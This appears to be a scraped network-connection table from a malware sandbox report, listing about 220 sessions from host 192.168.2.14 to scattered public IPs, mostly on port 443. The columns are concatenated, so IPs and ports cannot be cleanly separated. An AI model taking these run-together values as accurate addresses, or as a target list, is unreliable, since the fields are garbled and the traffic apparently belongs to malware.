                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16323192.168.2.1447966133.41.143.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16324192.168.2.1448604156.199.207.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16325192.168.2.1433940143.237.3.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16326192.168.2.145096688.243.124.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16327192.168.2.143547066.112.142.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16328192.168.2.144040296.24.63.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16329192.168.2.1449346150.16.176.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16330192.168.2.1441306173.120.33.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16331192.168.2.144296880.102.190.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16332192.168.2.144871267.134.11.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16333192.168.2.145744686.137.245.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16334192.168.2.1442276219.210.154.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16335192.168.2.1438848211.4.218.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16336192.168.2.1443202142.221.24.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16337192.168.2.145299861.32.72.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16338192.168.2.143952446.70.134.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16339192.168.2.1457152220.25.150.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16340192.168.2.143838496.45.147.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16341192.168.2.1450818177.133.118.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16342192.168.2.1443454176.63.214.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16343192.168.2.1457078163.125.25.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16344192.168.2.1449670116.69.243.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16345192.168.2.145375646.71.40.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16346192.168.2.144704474.156.109.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16347192.168.2.1439030109.1.169.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16348192.168.2.145155492.173.167.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16349192.168.2.1445252219.0.49.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16350192.168.2.14371364.77.225.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16351192.168.2.1451872148.53.233.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16352192.168.2.1453880111.15.26.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16353192.168.2.1455194184.147.248.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16354192.168.2.1444822126.152.53.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16355192.168.2.1433160110.55.148.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16356192.168.2.145721666.238.82.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16357192.168.2.143470436.58.48.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16358192.168.2.144963818.125.17.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16359192.168.2.1442922129.71.191.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16360192.168.2.1436786145.230.99.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16361192.168.2.144128089.239.7.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16362192.168.2.145300871.74.53.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16363192.168.2.1441332111.67.5.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16364192.168.2.145888088.252.130.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16365192.168.2.1433804118.186.153.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16366192.168.2.145048644.80.252.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16367192.168.2.145427017.2.200.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16368192.168.2.144394680.8.85.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16369192.168.2.1459556154.79.10.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16370192.168.2.144133019.98.6.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16371192.168.2.1451014125.55.117.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16372192.168.2.144558693.3.199.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16373192.168.2.1457566196.210.203.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16374192.168.2.145702612.220.75.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16375192.168.2.1436642109.161.90.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16376192.168.2.1458856177.76.227.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16377192.168.2.1445508132.5.102.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16378192.168.2.144244875.133.16.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16379192.168.2.143618473.108.66.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16380192.168.2.1449914205.92.48.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16381192.168.2.144106095.239.69.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16382192.168.2.145106884.40.126.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16383192.168.2.144179848.194.216.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16384192.168.2.1453460143.162.167.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16385192.168.2.1458642123.248.232.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16386192.168.2.1449336107.100.136.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16387192.168.2.1442752108.107.16.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16388192.168.2.1458388172.117.45.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16389192.168.2.1435786197.26.163.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16390192.168.2.1439632223.186.30.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16391192.168.2.1444094194.78.8.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16392192.168.2.1437164191.96.247.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16393192.168.2.14337305.16.235.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16394192.168.2.145972254.176.153.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16395192.168.2.143402619.20.120.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16396192.168.2.144637818.226.198.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16397192.168.2.144660845.186.229.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16398192.168.2.1436122155.39.191.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16399192.168.2.14463928.192.67.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16400192.168.2.1439854105.85.32.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16401192.168.2.1449030175.202.153.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16402192.168.2.14583402.187.57.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16403192.168.2.1454302187.79.136.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16404192.168.2.143982827.191.220.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16405192.168.2.145812414.10.216.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16406192.168.2.143334612.90.45.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16407192.168.2.1448154149.91.112.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16408192.168.2.1444206211.2.75.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16409192.168.2.146074263.162.156.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16410192.168.2.1456898149.248.20.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16411192.168.2.1447900195.116.120.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16412192.168.2.1457140177.214.39.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16413192.168.2.1440158133.249.68.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16414192.168.2.143296490.96.39.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16415192.168.2.1449048219.154.146.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16416192.168.2.143515423.168.14.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16417192.168.2.1456872114.191.178.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16418192.168.2.146084070.3.95.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16419192.168.2.144243252.132.188.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16420192.168.2.1460200114.64.127.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16421192.168.2.1435952103.92.253.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16422192.168.2.144161474.236.74.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16423192.168.2.1432940212.121.164.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16424192.168.2.145119636.146.6.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16425192.168.2.1443774211.216.75.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16426192.168.2.1444988199.30.21.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16427192.168.2.1459062144.68.255.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16428192.168.2.144055640.173.76.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16429192.168.2.1457816179.54.23.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16430192.168.2.1442514182.120.230.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16431192.168.2.1437656216.146.34.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16432192.168.2.1447364120.90.16.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16433192.168.2.1458870219.84.66.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16434192.168.2.1443812143.81.106.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16435192.168.2.145325427.167.248.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16436192.168.2.1442600109.151.86.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16437192.168.2.1433680117.198.131.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16438192.168.2.144420842.227.233.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16439192.168.2.144459439.147.70.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16440192.168.2.1444146118.122.124.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16441192.168.2.144381036.125.152.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16442192.168.2.1455564162.177.168.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16443192.168.2.145619698.127.73.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16444192.168.2.1459956200.25.88.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16445192.168.2.1457184216.125.127.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16446192.168.2.1458230143.84.208.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16447192.168.2.145408640.66.1.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16448192.168.2.144026493.248.109.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16449192.168.2.1433272139.99.86.1278080
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16450192.168.2.143735239.208.189.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16451192.168.2.143851824.94.178.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16452192.168.2.1437312178.169.187.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16453192.168.2.1452022121.195.204.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16454192.168.2.1454922108.27.81.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16455192.168.2.145660461.219.237.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16456192.168.2.143696237.156.1.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16457192.168.2.1458156211.127.67.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16458192.168.2.1449652123.84.199.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16459192.168.2.1437224114.27.194.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16460192.168.2.1445890104.199.232.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16461192.168.2.144827297.19.99.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16462192.168.2.145210059.116.87.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16463192.168.2.1436184191.243.180.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16464192.168.2.143408276.159.122.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16465192.168.2.1449048184.70.83.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16466192.168.2.144487835.196.236.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16467192.168.2.145835265.167.247.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16468192.168.2.144692264.221.39.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16469192.168.2.1442598192.6.212.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16470192.168.2.145771475.246.141.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16471192.168.2.144409296.38.214.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16472192.168.2.1456582135.247.58.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16473192.168.2.1442832189.23.95.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16474192.168.2.1444364138.118.188.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16475192.168.2.14538809.137.228.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16476192.168.2.144594276.223.31.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16477192.168.2.144014451.227.80.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16478192.168.2.144772290.13.198.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16479192.168.2.1448506105.192.65.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16480192.168.2.143345097.103.53.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16481192.168.2.143485881.59.98.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16482192.168.2.1451930206.167.35.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16483192.168.2.1434726182.208.170.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16484192.168.2.1441934147.112.140.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16485192.168.2.1448080188.97.70.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16486192.168.2.144677441.15.205.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16487192.168.2.1442416117.210.250.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16488192.168.2.1438874216.58.64.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16489192.168.2.1446610212.104.151.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16490192.168.2.1458780182.52.130.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16491192.168.2.144235449.19.91.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16492192.168.2.143902841.45.121.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16493192.168.2.143983053.35.245.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16494192.168.2.145904061.174.208.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16495192.168.2.145887453.239.188.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16496192.168.2.1447656114.104.129.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16497192.168.2.14483124.13.178.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16498192.168.2.143959471.173.22.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16499192.168.2.1433130221.159.125.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16500192.168.2.1443198121.147.198.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16501192.168.2.144218650.112.226.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16502192.168.2.143515881.24.182.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16503192.168.2.1449828218.193.13.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16504192.168.2.1441770183.69.44.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16505192.168.2.144796862.233.197.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16506192.168.2.145782261.102.175.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16507192.168.2.144455479.105.40.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16508192.168.2.14416224.40.5.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16509192.168.2.1456744223.54.56.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16510192.168.2.1436178182.227.79.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16511192.168.2.145405819.198.173.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16512192.168.2.1441636110.244.125.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16513192.168.2.144731461.237.191.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16514192.168.2.145179289.42.117.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16515192.168.2.144447040.211.3.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16516192.168.2.1454876112.47.36.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16517192.168.2.143620617.76.248.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16518192.168.2.144574666.118.142.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16519192.168.2.1450870171.184.75.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16520192.168.2.145812037.121.141.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16521192.168.2.1436922145.175.102.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16522192.168.2.1450578186.14.22.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16523192.168.2.1446106145.157.32.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16524192.168.2.143328214.178.16.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16525192.168.2.145780474.40.156.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16526192.168.2.144438283.23.104.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16527192.168.2.1449958171.29.173.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16528192.168.2.1447458188.41.25.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16529192.168.2.144701659.72.220.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16530192.168.2.1452092160.78.47.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16531192.168.2.1457626115.123.150.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16532192.168.2.1458714128.184.16.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16533192.168.2.1436798193.115.221.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16534192.168.2.143961612.203.81.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16535192.168.2.1452126162.138.143.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16536192.168.2.146059059.98.174.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16537192.168.2.146033685.205.239.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16538192.168.2.144665070.161.51.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16539192.168.2.1450716200.51.206.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16540192.168.2.145005847.149.130.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16541192.168.2.1457948213.205.160.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16542192.168.2.1442528130.202.14.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16543192.168.2.1453070142.219.27.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16544192.168.2.145858446.50.59.197443
